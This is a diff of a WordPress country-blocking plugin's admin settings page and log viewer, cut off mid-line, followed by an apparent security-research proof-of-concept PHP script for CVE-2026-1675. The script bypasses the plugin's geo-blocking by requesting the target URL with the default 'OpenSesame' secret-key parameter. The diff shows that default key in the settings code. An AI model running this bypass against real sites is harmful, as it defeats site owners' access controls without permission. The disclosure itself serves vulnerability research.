-						<h2>📍 <?php esc_html_e( 'GeoIP Lookup', 'advcb' ); ?></h2>
-					</div>
-					<div class="advcb-card-content">
-						<div class="advcb-field-group">
-							<label><?php esc_html_e( 'Lookup Method', 'advcb' ); ?></label>
-							<select name="advcb_geoip_source" class="advcb-select">
-								<option value="api" <?php selected( $geoip_source, 'api' ); ?>><?php esc_html_e( 'Remote API (ip-api.com)', 'advcb' ); ?></option>
-								<option value="database" <?php selected( $geoip_source, 'database' ); ?>><?php esc_html_e( 'Local MaxMind Database', 'advcb' ); ?></option>
-							</select>
-							<p class="advcb-field-description">
-								<?php esc_html_e( 'Use the remote API for quick setup. Switch to local database for fully offline lookups.', 'advcb' ); ?>
-							</p>
-							<?php if ( 'database' === $geoip_source && ! $geoip_db_readable ) : ?>
-								<p class="advcb-field-warning">
-									<span class="dashicons dashicons-warning"></span>
-									<?php esc_html_e( 'Local lookup is selected but the database is not readable yet. Falling back to remote API.', 'advcb' ); ?>
-								</p>
-							<?php endif; ?>
-						</div>
-
-						<div class="advcb-field-group">
-							<label><?php esc_html_e( 'Database Status', 'advcb' ); ?></label>
-							<?php if ( $geoip_db_readable ) : ?>
-								<div class="advcb-status advcb-status-success">
-									<span class="dashicons dashicons-yes-alt"></span>
-									<span><?php printf( esc_html__( 'Using %s', 'advcb' ), '<code>' . esc_html( basename( $geoip_db_path ) ) . '</code>' ); ?></span>
-								</div>
-								<?php
-								$db_details = array();
-								if ( $geoip_db_path ) {
-									if ( function_exists( 'size_format' ) ) {
-										$size = @filesize( $geoip_db_path );
-										if ( false !== $size ) {
-											$db_details[] = size_format( $size );
-										}
-									}
-									$modified = @filemtime( $geoip_db_path );
-									if ( $modified ) {
-										$db_details[] = esc_html__( 'updated', 'advcb' ) . ' ' . date_i18n( get_option( 'date_format' ) . ' ' . get_option( 'time_format' ), $modified );
-									}
-								}
-								if ( ! empty( $db_details ) ) {
-									echo '<p class="advcb-field-description">(' . esc_html( implode( ', ', $db_details ) ) . ')</p>';
-								}
-								?>
-							<?php else : ?>
-								<div class="advcb-status advcb-status-warning">
-									<span class="dashicons dashicons-warning"></span>
-									<?php esc_html_e( 'No readable database found. Download or upload a GeoLite2 Country .mmdb file.', 'advcb' ); ?>
-								</div>
-							<?php endif; ?>
-							<p class="advcb-field-description">
-								<?php
-								if ( $geoip_storage_dir ) {
-									printf( esc_html__( 'Databases are stored in: %s', 'advcb' ), '<code>' . esc_html( $geoip_storage_dir ) . '</code>' );
-								} else {
-									esc_html_e( 'Databases are stored in your WordPress uploads directory.', 'advcb' );
-								}
-								?>
-							</p>
-						</div>
-
-						<div class="advcb-field-group">
-							<label><?php esc_html_e( 'Download Database', 'advcb' ); ?></label>
-							<div class="advcb-button-group">
-								<button type="submit" class="button button-secondary" form="advcb-download-geoip-gitio">
-									<?php esc_html_e( 'Download from Git.io', 'advcb' ); ?>
-								</button>
-								<button type="submit" class="button button-secondary" form="advcb-download-geoip-mirror">
-									<?php esc_html_e( 'Download from Mirror', 'advcb' ); ?>
-								</button>
-							</div>
-							<div class="advcb-custom-download">
-								<input type="url" class="regular-text" id="advcb_geoip_custom_url" name="advcb_geoip_url" placeholder="https://example.com/GeoLite2-Country.mmdb" form="advcb-download-geoip-custom" />
-								<button type="submit" class="button button-primary" form="advcb-download-geoip-custom">
-									<?php esc_html_e( 'Download from URL', 'advcb' ); ?>
-								</button>
-							</div>
-						</div>
-
-						<div class="advcb-field-group">
-							<label><?php esc_html_e( 'Upload Database', 'advcb' ); ?></label>
-							<div class="advcb-upload-section">
-								<input type="file" name="advcb_geoip_file" accept=".mmdb" form="advcb-upload-geoip" />
-								<button type="submit" class="button button-primary" form="advcb-upload-geoip">
-									<?php esc_html_e( 'Upload & Use Database', 'advcb' ); ?>
-								</button>
-							</div>
-						</div>
-					</div>
-				</div>
-
-				<!-- Block Page Card -->
-				<div class="advcb-settings-card">
-					<div class="advcb-card-header">
-						<h2>🚫 <?php esc_html_e( 'Block Page', 'advcb' ); ?></h2>
-					</div>
-					<div class="advcb-card-content">
-						<div class="advcb-field-group">
-							<label for="advcb_block_page_title"><?php esc_html_e( 'Page Title', 'advcb' ); ?></label>
-							<input type="text" class="regular-text" id="advcb_block_page_title" name="advcb_block_page_title" value="<?php echo esc_attr( $block_page_title ); ?>" placeholder="<?php esc_attr_e( 'Access Restricted', 'advcb' ); ?>" />
-						</div>
-
-						<div class="advcb-field-group">
-							<label for="advcb_block_message"><?php esc_html_e( 'Message', 'advcb' ); ?></label>
-							<textarea id="advcb_block_message" name="advcb_block_message" rows="3" class="large-text" placeholder="<?php esc_attr_e( 'We're sorry, but your location is not allowed to view this site.', 'advcb' ); ?>"><?php echo esc_textarea( $block_message ); ?></textarea>
-							<p class="advcb-field-description">
-								<?php esc_html_e( 'Available placeholders:', 'advcb' ); ?> <code>{ip}</code>, <code>{country_code}</code>, <code>{reason}</code>
-							</p>
-						</div>
-
-						<div class="advcb-field-row">
-							<div class="advcb-field-group">
-								<label for="advcb_http_status_code"><?php esc_html_e( 'HTTP Status', 'advcb' ); ?></label>
-								<select name="advcb_http_status_code" id="advcb_http_status_code" class="advcb-select">
-									<option value="403" <?php selected( $http_status_code, 403 ); ?>>403 Forbidden</option>
-									<option value="410" <?php selected( $http_status_code, 410 ); ?>>410 Gone</option>
-									<option value="451" <?php selected( $http_status_code, 451 ); ?>>451 Unavailable for Legal Reasons</option>
-								</select>
-							</div>
-						</div>
-
-						<div class="advcb-field-group advcb_enable_redirect">
-							<label>
-								<input type="checkbox" name="advcb_enable_redirect" value="1" <?php checked( $enable_redirect ); ?> />
-								<?php esc_html_e( 'Redirect blocked visitors instead of showing block page', 'advcb' ); ?>
-							</label>
-						</div>
-
-						<div class="advcb-field-group advcb-redirect-settings">
-							<label for="advcb_redirect_url"><?php esc_html_e( 'Redirect URL', 'advcb' ); ?></label>
-							<input type="url" class="regular-text" id="advcb_redirect_url" name="advcb_redirect_url" value="<?php echo esc_attr( $redirect_url ); ?>" placeholder="https://example.com/blocked" />
-						</div>
-
-						<div class="advcb-field-group advcb-redirect-settings">
-							<label for="advcb_redirect_status_code"><?php esc_html_e( 'Redirect Status', 'advcb' ); ?></label>
-							<select name="advcb_redirect_status_code" id="advcb_redirect_status_code" class="advcb-select">
-								<option value="302" <?php selected( $redirect_status, 302 ); ?>>302 Temporary Redirect</option>
-								<option value="301" <?php selected( $redirect_status, 301 ); ?>>301 Permanent Redirect</option>
-								<option value="307" <?php selected( $redirect_status, 307 ); ?>>307 Temporary Redirect</option>
-								<option value="308" <?php selected( $redirect_status, 308 ); ?>>308 Permanent Redirect</option>
-							</select>
-						</div>
-					</div>
-				</div>
-
-				<!-- Access Control Card -->
-				<div class="advcb-settings-card">
-					<div class="advcb-card-header">
-						<h2>🔐 <?php esc_html_e( 'Access Control', 'advcb' ); ?></h2>
-					</div>
-					<div class="advcb-card-content">
-						<div class="advcb-field-group">
-							<label for="advcb_secret_key"><?php esc_html_e( 'Secret Key for Temporary Access', 'advcb' ); ?></label>
-							<input type="text" class="regular-text code" id="advcb_secret_key" name="advcb_secret_key" value="<?php echo esc_attr( $current_secret_key ); ?>" placeholder="OpenSesame" />
-							<p class="advcb-field-description">
-								<?php printf( esc_html__( 'Append %s to the URL to gain temporary access.', 'advcb' ), '<code>?<span id="advcb-secret-preview">' . esc_html( $current_secret_key ) . '</span>=1</code>' ); ?>
-							</p>
-						</div>
-
-						<div class="advcb-field-group">
-							<label for="advcb_blacklisted_ips"><?php esc_html_e( 'Blacklisted IP Addresses', 'advcb' ); ?></label>
-							<input type="text" id="advcb_blacklisted_ips" name="advcb_blacklisted_ips" value="<?php echo esc_attr( is_array( get_option( 'advcb_blacklisted_ips', array() ) ) ? implode( ',', get_option( 'advcb_blacklisted_ips', array() ) ) : get_option( 'advcb_blacklisted_ips', '' ) ); ?>" placeholder="1.2.3.4, 5.6.7.8" />
-							<p class="advcb-field-description"><?php esc_html_e( 'Comma-separated IPs that will be blocked regardless of country filtering.', 'advcb' ); ?></p>
-						</div>
-
-						<div class="advcb-field-group">
-							<label for="advcb_trusted_ips"><?php esc_html_e( 'Trusted IP Addresses', 'advcb' ); ?></label>
-							<input type="text" id="advcb_trusted_ips" name="advcb_trusted_ips" value="<?php echo esc_attr( $trusted_ips ); ?>" placeholder="1.2.3.4, 5.6.7.8" />
-							<p class="advcb-field-description"><?php esc_html_e( 'Comma-separated IPs that always bypass the blocker. Useful for uptime monitors.', 'advcb' ); ?></p>
-						</div>
-
-						<div class="advcb-field-divider"></div>
-						<h3><?php esc_html_e( 'CAPTCHA Challenge', 'advcb' ); ?></h3>
-
-						<div class="advcb-field-group">
-							<label>
-								<input type="checkbox" name="advcb_enable_captcha" value="1" <?php checked( $captcha_enabled ); ?> />
-								<?php esc_html_e( 'Enable CAPTCHA Challenge', 'advcb' ); ?>
-							</label>
-							<p class="advcb-field-description"><?php esc_html_e( 'Blocked visitors can solve a CAPTCHA to gain temporary access instead of being completely blocked.', 'advcb' ); ?></p>
-						</div>
-
-						<div class="advcb-field-row">
-							<div class="advcb-field-group">
-								<label for="advcb_captcha_provider"><?php esc_html_e( 'Provider', 'advcb' ); ?></label>
-								<select name="advcb_captcha_provider" id="advcb_captcha_provider" class="advcb-select">
-									<option value="recaptcha_v2" <?php selected( 'recaptcha_v2', $captcha_provider ); ?>>reCAPTCHA v2</option>
-									<option value="recaptcha_v3" <?php selected( 'recaptcha_v3', $captcha_provider ); ?>>reCAPTCHA v3</option>
-									<option value="hcaptcha" <?php selected( 'hcaptcha', $captcha_provider ); ?>>hCaptcha</option>
-									<option value="turnstile" <?php selected( 'turnstile', $captcha_provider ); ?>>Cloudflare Turnstile</option>
-								</select>
-							</div>
-							<div class="advcb-field-group">
-								<label for="advcb_captcha_duration"><?php esc_html_e( 'Access Duration', 'advcb' ); ?></label>
-								<input type="number" id="advcb_captcha_duration" name="advcb_captcha_duration" value="<?php echo esc_attr( $captcha_duration ); ?>" min="1" max="168" class="small-text" />
-								<span><?php esc_html_e( 'hours', 'advcb' ); ?></span>
-							</div>
-						</div>
-
-						<div class="advcb-field-row">
-							<div class="advcb-field-group">
-								<label for="advcb_captcha_site_key"><?php esc_html_e( 'Site Key', 'advcb' ); ?></label>
-								<input type="text" id="advcb_captcha_site_key" name="advcb_captcha_site_key" value="<?php echo esc_attr( $captcha_site_key ); ?>" class="regular-text" />
-							</div>
-							<div class="advcb-field-group">
-								<label for="advcb_captcha_secret_key"><?php esc_html_e( 'Secret Key', 'advcb' ); ?></label>
-								<input type="password" id="advcb_captcha_secret_key" name="advcb_captcha_secret_key" value="<?php
-								$secret_key = get_option( 'advcb_captcha_secret_key', '' );
-								if ( isset( $_POST['advcb_captcha_secret_key'] ) && ! empty( $_POST['advcb_captcha_secret_key'] ) ) {
-									echo esc_attr( sanitize_text_field( wp_unslash( $_POST['advcb_captcha_secret_key'] ) ) );
-								} elseif ( ! empty( $secret_key ) ) {
-									echo '••••••••••••••••';
-								}
-								?>" autocomplete="off" class="regular-text" />
-							</div>
-						</div>
-
-						<div class="advcb-field-group advcb-recaptcha-v3-setting" style="display: none;">
-							<label for="advcb_captcha_threshold"><?php esc_html_e( 'reCAPTCHA v3 Threshold', 'advcb' ); ?></label>
-							<input type="number" id="advcb_captcha_threshold" name="advcb_captcha_threshold" value="<?php echo esc_attr( $captcha_threshold ); ?>" min="0" max="1" step="0.1" class="small-text" />
-							<p class="advcb-field-description"><?php esc_html_e( 'Score threshold (0.0 - 1.0). Lower is stricter.', 'advcb' ); ?></p>
-						</div>
-					</div>
-				</div>
-
-				<!-- Logging & Alerts Card -->
-				<div class="advcb-settings-card">
-					<div class="advcb-card-header">
-						<h2>📊 <?php esc_html_e( 'Logging & Alerts', 'advcb' ); ?></h2>
-					</div>
-					<div class="advcb-card-content">
-						<div class="advcb-field-group">
-							<label>
-								<input type="checkbox" name="advcb_enable_logs" value="1" <?php checked( true, (bool) get_option( 'advcb_enable_logs', true ) ); ?> />
-								<?php esc_html_e( 'Enable Logging', 'advcb' ); ?>
-							</label>
-							<p class="advcb-field-description"><?php esc_html_e( 'Keep a record of blocked attempts in the database.', 'advcb' ); ?></p>
-						</div>
-
-						<div class="advcb-field-group">
-							<label for="advcb_log_retention_days"><?php esc_html_e( 'Log Retention', 'advcb' ); ?></label>
-							<input type="number" id="advcb_log_retention_days" name="advcb_log_retention_days" value="<?php echo esc_attr( $log_retention_days ); ?>" min="0" class="small-text" />
-							<span><?php esc_html_e( 'days', 'advcb' ); ?></span>
-							<p class="advcb-field-description"><?php esc_html_e( 'Entries older than this will be automatically deleted. Use 0 to keep logs forever.', 'advcb' ); ?></p>
-						</div>
-
-						<div class="advcb-field-divider"></div>
-
-						<div class="advcb-field-group">
-							<label>
-								<input type="checkbox" name="advcb_send_email_alerts" value="1" <?php checked( true, (bool) get_option( 'advcb_send_email_alerts', false ) ); ?> />
-								<?php esc_html_e( 'Enable Email Alerts', 'advcb' ); ?>
-							</label>
-						</div>
-
-						<div class="advcb-field-group">
-							<label for="advcb_alert_email"><?php esc_html_e( 'Alert Email Address', 'advcb' ); ?></label>
-							<input type="email" id="advcb_alert_email" name="advcb_alert_email" value="<?php echo esc_attr( get_option( 'advcb_alert_email', get_option( 'admin_email' ) ) ); ?>" class="regular-text" />
-						</div>
-					</div>
-				</div>
-
-			</div>
-
-			<!-- Save Button -->
-			<div class="advcb-save-section">
-				<?php submit_button( null, 'primary', 'submit', true, array( 'id' => 'advcb-save-button' ) ); ?>
-			</div>
-		</form>
-
-		<!-- Hidden Forms for GeoIP Operations -->
-		<form id="advcb-download-geoip-gitio" class="advcb-hidden-form" method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>" style="display:none;" aria-hidden="true">
-			<?php wp_nonce_field( 'advcb_geoip_download' ); ?>
-			<input type="hidden" name="action" value="advcb_geoip_download" />
-			<input type="hidden" name="advcb_geoip_url" value="https://git.io/GeoLite2-Country.mmdb" />
-		</form>
-		<form id="advcb-download-geoip-mirror" class="advcb-hidden-form" method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>" style="display:none;" aria-hidden="true">
-			<?php wp_nonce_field( 'advcb_geoip_download' ); ?>
-			<input type="hidden" name="action" value="advcb_geoip_download" />
-			<input type="hidden" name="advcb_geoip_url" value="https://github.com/P3TERX/GeoLite.mmdb/raw/download/GeoLite2-Country.mmdb" />
-		</form>
-		<form id="advcb-download-geoip-custom" class="advcb-hidden-form" method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>" style="display:none;" aria-hidden="true">
-			<?php wp_nonce_field( 'advcb_geoip_download' ); ?>
-			<input type="hidden" name="action" value="advcb_geoip_download" />
-		</form>
-		<form id="advcb-upload-geoip" class="advcb-hidden-form" method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>" enctype="multipart/form-data" style="display:none;" aria-hidden="true">
-			<?php wp_nonce_field( 'advcb_geoip_upload' ); ?>
-			<input type="hidden" name="action" value="advcb_geoip_upload" />
-		</form>
-	</div>
-
-	<!-- Inline JavaScript -->
-	<script>
-	jQuery(document).ready(function($) {
-		// Add new select box when "Add Country" is clicked.
-		$('#advcb_add_country').on('click', function(){
-			var $clone = $('#advcb_country_selector_container .advcb_country_selector:first').clone();
-			$clone.find('select').val('');
-			$('#advcb_country_selector_container').append($clone);
-		});
-
-		// Remove a select box when its remove button is clicked.
-		$(document).on('click', '.advcb_remove_country', function(){
-			if ($('#advcb_country_selector_container .advcb_country_selector').length > 1) {
-				$(this).closest('.advcb_country_selector').remove();
-			} else {
-				alert('<?php esc_html_e( 'At least one country must be selected.', 'advcb' ); ?>');
-			}
-		});
-
-		// Update secret key preview on input change.
-		$('#advcb_secret_key').on('input', function() {
-			$('#advcb-secret-preview').text($(this).val() || 'OpenSesame');
-		});
-
-		// Show/hide reCAPTCHA v3 threshold and redirect settings.
-		function toggleDynamicSettings() {
-			var provider = $('select[name="advcb_captcha_provider"]').val();
-			if (provider === 'recaptcha_v3') {
-				$('.advcb-recaptcha-v3-setting').show();
-			} else {
-				$('.advcb-recaptcha-v3-setting').hide();
-			}
-
-			var redirectEnabled = $('input[name="advcb_enable_redirect"]').prop('checked');
-			if (redirectEnabled) {
-				$('.advcb-redirect-settings').show();
-			} else {
-				$('.advcb-redirect-settings').hide();
-			}
-		}
-
-		// Run on page load and when settings change.
-		toggleDynamicSettings();
-		$('select[name="advcb_captcha_provider"]').on('change', toggleDynamicSettings);
-		$('input[name="advcb_enable_redirect"]').on('change', toggleDynamicSettings);
-	});
-	</script>
-
-	<style>
-		.advcb-settings-wrap {
-			max-width: 1400px;
-		}
-
-		.advcb-settings-grid {
-			display: grid;
-			grid-template-columns: repeat(auto-fill, minmax(450px, 1fr));
-			gap: 20px;
-			margin: 20px 0;
-		}
-
-		.advcb-settings-card {
-			background: #fff;
-			border: 1px solid #c3c4c7;
-			border-radius: 8px;
-			overflow: hidden;
-			box-shadow: 0 1px 3px rgba(0,0,0,0.05);
-		}
-
-		.advcb-card-header {
-			padding: 15px 20px;
-			background: #f6f7f7;
-			border-bottom: 1px solid #c3c4c7;
-		}
-
-		.advcb-card-header h2 {
-			margin: 0;
-			font-size: 1.1em;
-			color: #1d2327;
-			display: flex;
-			align-items: center;
-			gap: 8px;
-		}
-
-		.advcb-card-content {
-			padding: 20px;
-		}
-
-		.advcb-card-content > h3 {
-			margin-top: 0;
-			padding-top: 15px;
-			font-size: 1em;
-			color: #1d2327;
-			border-top: 1px solid #eee;
-		}
-
-		.advcb-field-group {
-			margin-bottom: 18px;
-		}
-
-		.advcb-field-group:last-child {
-			margin-bottom: 0;
-		}
-
-		.advcb-field-group label {
-			display: block;
-			font-weight: 600;
-			margin-bottom: 6px;
-			color: #1d2327;
-		}
-
-		.advcb-field-group input[type="text"],
-		.advcb-field-group input[type="url"],
-		.advcb-field-group input[type="email"],
-		.advcb-field-group input[type="number"],
-		.advcb-field-group input[type="password"],
-		.advcb-field-group select,
-		.advcb-field-group textarea {
-			width: 100%;
-			max-width: 400px;
-		}
-
-		.advcb-field-group input.code {
-			font-family: Monaco, Consolas, monospace;
-		}
-
-		.advcb-field-group input.small-text {
-			width: 80px;
-		}
-
-		.advcb-field-description {
-			margin: 6px 0 0;
-			font-size: 13px;
-			color: #646970;
-			line-height: 1.4;
-		}
-
-		.advcb-field-description code {
-			background: #f0f0f1;
-			padding: 2px 6px;
-			border-radius: 3px;
-			font-size: 12px;
-		}
-
-		.advcb-field-warning {
-			margin: 8px 0 0;
-			padding: 8px 12px;
-			background: #fff8e5;
-			border-left: 3px solid #dba617;
-			color: #646970;
-			font-size: 13px;
-			display: flex;
-			align-items: center;
-			gap: 8px;
-		}
-
-		.advcb-field-warning .dashicons {
-			color: #dba617;
-		}
-
-		.advcb-field-row {
-			display: grid;
-			grid-template-columns: 1fr 1fr;
-			gap: 15px;
-		}
-
-		.advcb-field-divider {
-			height: 1px;
-			background: #eee;
-			margin: 20px 0;
-		}
-
-		.advcb-status {
-			display: inline-flex;
-			align-items: center;
-			gap: 8px;
-			padding: 6px 12px;
-			border-radius: 4px;
-			font-size: 13px;
-		}
-
-		.advcb-status-success {
-			background: #edfaef;
-			color: #00a32a;
-		}
-
-		.advcb-status-success .dashicons {
-			color: #00a32a;
-		}
-
-		.advcb-status-warning {
-			background: #fff8e5;
-			color: #dba617;
-		}
-
-		.advcb-button-group {
-			display: flex;
-			gap: 10px;
-			flex-wrap: wrap;
-		}
-
-		.advcb-custom-download {
-			display: flex;
-			gap: 10px;
-			margin-top: 10px;
-		}
-
-		.advcb-upload-section {
-			display: flex;
-			flex-direction: column;
-			gap: 10px;
-		}
-
-		.advcb-upload-section input[type="file"] {
-			max-width: 300px;
-		}
-
-		.advcb_country_selector {
-			display: flex;
-			gap: 8px;
-			margin-bottom: 8px;
-		}
-
-		.advcb_country_selector select {
-			flex: 1;
-			max-width: none;
-		}
-
-        .advcb_enable_redirect {
-            margin-top: 10px;
-        }
-
-		/* Responsive */
-		@media (max-width: 1200px) {
-			.advcb-settings-grid {
-				grid-template-columns: 1fr;
-			}
-		}
-
-		@media (max-width: 600px) {
-			.advcb-field-row {
-				grid-template-columns: 1fr;
-			}
-
-			.advcb-button-group {
-				flex-direction: column;
-			}
-
-			.advcb-custom-download {
-				flex-direction: column;
-			}
-		}
-	</style>
-	<?php
-}
-
-/**
- * SHOW THE BLOCK LOGS IN THE ADMIN
- */
-function advcb_block_logs_page() {
-        global $wpdb;
-        $table_name = $wpdb->prefix . 'advcb_block_logs';
-
-        advcb_cleanup_logs();
-
-        // Check for a truncate action and validate nonce.
-        if ( isset( $_GET['action'] ) && $_GET['action'] === 'truncate_logs' && isset( $_GET['_wpnonce'] ) && wp_verify_nonce( $_GET['_wpnonce'], 'truncate_logs' ) ) {
-                $wpdb->query( "TRUNCATE TABLE $table_name" );
-                echo '<div class="updated notice"><p>Logs have been cleared.</p></div>';
-	}
-
-	$paged  = isset( $_GET['paged'] ) ? absint( $_GET['paged'] ) : 1;
-	$limit  = 20;
-	$offset = ( $paged - 1 ) * $limit;
-
-	$results = $wpdb->get_results( $wpdb->prepare(
-		"SELECT * FROM $table_name ORDER BY blocked_time DESC LIMIT %d OFFSET %d",
-		$limit,
-		$offset
-	) );
-
-	$total       = $wpdb->get_var( "SELECT COUNT(*) FROM $table_name" );
-	$total_pages = ceil( $total / $limit );
-        ?>
-    <div class="wrap">
-        <h1>Blocked Attempts Log</h1>
-        <p class="description">
-            <?php
-            $retention_days = absint( get_option( 'advcb_log_retention_days', 30 ) );
-            if ( $retention_days > 0 ) {
-                    printf( esc_html__( 'Entries older than %d day(s) are removed automatically.', 'advcb' ), $retention_days );
-            } else {
-                    esc_html_e( 'Automatic log cleanup is currently disabled.', 'advcb' );
-            }
-            ?>
-        </p>
-        <!-- Add a Clear Logs button -->
-        <p>
-            <a href="<?php echo esc_url( add_query_arg( array(
-                                'action'   => 'truncate_logs',
-                                '_wpnonce' => wp_create_nonce( 'truncate_logs' )
-			) ) ); ?>" class="button button-secondary" onclick="return confirm('Are you sure you want to clear all logs?');">
-                Clear Logs
-            </a>
-        </p>
-		<?php if ( $results ) : ?>
-            <table class="widefat fixed striped">
-                <thead>
-                <tr>
-                    <th width="50px">ID</th>
-                    <th width="150px">IP</th>
-                    <th width="100px">Country Code</th>
-                    <th>Reason</th>
-                    <th width="200px">Time</th>
-                </tr>
-                </thead>
-                <tbody>
-				<?php foreach ( $results as $row ) : ?>
-                    <tr>
-                        <td><?php echo esc_html( $row->id ); ?></td>
-                        <td><?php echo esc_html( $row->ip ); ?></td>
-                        <td><?php echo esc_html( $row->country_code ); ?></td>
-                        <td><?php echo esc_html( $row->reason ); ?></td>
-                        <td><?php echo esc_html( $row->blocked_time ); ?></td>
-                    </tr>
-				<?php endforeach; ?>
-                </tbody>
-            </table>
-			<?php if ( $total_pages > 1 ) : ?>
-                <div class="tablenav">
-                    <div class="tablenav-pages">
-						<?php
-						// Limit pagination to a maximum of 10 buttons.
-						if ( $total_pages > 10 ) {
-							if ( $paged <= 6 ) {
-								$start = 1;
-								$end   = 10;
-							} elseif ( $paged > $total_pages - 5 ) {
-								$start = $total_pages - 9;
-								$end   = $total_pages;
-							} else {
-								$start = $paged - 5;
-								$end   = $paged + 4;
-							}
-						} else {
-							$start = 1;
-							$end   = $total_pages;
-						}
-
-						// Optionally, add a "Previous" button.
-						if ( $paged > 1 ) {
-							echo '<a class="button" href="' . esc_url( add_query_arg( array( 'page' => 'advcb_block_logs', 'paged' => $paged - 1 ) ) ) . '">« Prev</a> ';
-						}
-
-						for ( $i = $start; $i <= $end; $i++ ) {
-							$class = ( $i == $paged ) ? ' class="button button-primary disabled"' : ' class="button"';
-							echo '<a' . wp_kses_post($class) . ' href="' . esc_url( add_query_arg( array( 'page' => 'advcb_block_logs', 'paged' => $i ) ) ) . '">' . esc_html( $i ) . '</a> ';
-						}
-
-						// Optionally, add a "Next" button.
-						if ( $paged < $total_pages ) {
-							echo '<a class="button" href="' . esc_url( add_query_arg( array( 'page' => 'advcb_block_logs', 'paged' => $paged + 1 ) ) ) . '">Next »</a>';
-						}
-						?>
-                    </div>
-                </div>
-			<?php endif; ?>
-		<?php else : ?>
-            <p>No blocked attempts logged yet.</p>
-		<?php endif; ?>
-    </div>
-	<?php
-}
-
-
-/**
- * REAL-TIME ACTIVITY MONITOR
- */
-
-/**
- * Track visitor for real-time monitoring.
- * Runs on every page load to update visitor activity.
- */
-function advcb_track_visitor_activity() {
-	// Don't track admin users in the monitor (optional).
-	if ( current_user_can( 'manage_options' ) ) {
-		return;
-	}
-
-	$ip = advcb_get_visitor_ip();
-
-	if ( 'unknown' === $ip ) {
-		return;
-	}
-
-	// Get existing activity data.
-	$activity = get_transient( 'advcb_live_activity' );
-	if ( ! is_array( $activity ) ) {
-		$activity = array(
-			'visitors'   => array(),
-			'blocks'     => array(),
-			'statistics' => array(
-				'today_visitors' => 0,
-				'today_blocks'   => 0,
-				'active_now'     => 0,
-			),
-		);
-	}
-
-	$current_time = current_time( 'mysql' );
-	$timestamp = time();
-
-	// Update or add visitor.
-	$found = false;
-	foreach ( $activity['visitors'] as &$visitor ) {
-		if ( $visitor['ip'] === $ip ) {
-			$visitor['last_seen'] = $current_time;
-			$visitor['timestamp'] = $timestamp;
-			$visitor['requests']++;
-			$found = true;
-			break;
-		}
-	}
-	unset( $visitor );
-
-	if ( ! $found ) {
-		// Get visitor country.
-		$country_code = advcb_get_country_code_for_ip( $ip );
-		$country_name = advcb_get_country_name( $country

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1675 - Advanced Country Blocker <= 2.3.1 - Unauthenticated Authorization Bypass via Insecure Default Secret Key

<?php
/**
 * Proof of Concept for CVE-2026-1675
 * Demonstrates authorization bypass in Advanced Country Blocker plugin
 * Usage: php poc.php http://vulnerable-site.com
 */

$target_url = isset($argv[1]) ? $argv[1] : 'http://localhost/wordpress';
$default_key = 'OpenSesame'; // Hardcoded default secret key

// Test the default bypass key
function test_bypass($url, $key) {
    $test_url = $url . '?' . $key . '=1';
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $test_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Atomic-Edge-PoC/1.0');
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    return array('code' => $http_code, 'url' => $test_url);
}

// Attempt bypass with default key
echo "[*] Testing Advanced Country Blocker bypass on: $target_urln";
echo "[*] Using default secret key: $default_keyn";

$result = test_bypass($target_url, $default_key);

echo "[*] Request URL: " . $result['url'] . "n";
echo "[*] HTTP Response Code: " . $result['code'] . "n";

// Analyze results
if ($result['code'] == 200) {
    echo "[+] SUCCESS: Authorization bypass successful. Plugin blocking circumvented.n";
    echo "[+] The site is vulnerable to CVE-2026-1675.n";
} elseif ($result['code'] == 403) {
    echo "[-] FAILED: Received 403 Forbidden. Possible scenarios:n";
    echo "    - Plugin not installed/activatedn";
    echo "    - Administrator changed the default secret keyn";
    echo "    - IP address is blacklistedn";
} else {
    echo "[?] UNKNOWN: Received HTTP " . $result['code'] . ". Manual verification required.n";
}

// Note: This PoC only tests the default key.
// Administrators who changed the key are not vulnerable.
echo "n[!] Note: This vulnerability only affects installations wheren";
echo "    administrators did not change the default 'advcb_secret_key' option.n";
?>